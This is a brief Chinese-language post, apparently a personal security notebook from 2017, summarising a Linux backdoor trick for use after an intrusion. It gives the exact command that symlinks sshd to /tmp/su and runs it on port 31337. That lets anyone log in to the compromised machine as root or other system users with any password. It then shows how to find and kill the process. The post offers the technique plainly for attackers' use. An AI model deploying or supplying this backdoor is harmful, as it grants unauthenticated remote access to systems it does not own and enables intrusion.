@websec007
2017-07-26T20:46:14.000000Z
字数 518
阅读 1677
未分类
学习参考:
http://weibo.com/1869235073/B9Seswf9R?type=comment
http://weibo.com/p/1001603723521007220513
http://www.sohu.com/a/126011736_505860
linux 常用shell反弹方法小结:
https://edu.aqniu.com/group/3/thread/22
入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口肉鸡上执行
myles@localhost:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。效果图:
临时后门生成后,如果我们需要杀死这个进程,请使用以下语句。
myles@localhost# ps -ef |grep 31337 #查询后门进程ID
myles@localhost# kill -9 ssh_pid #使用kill -9 直接杀死进程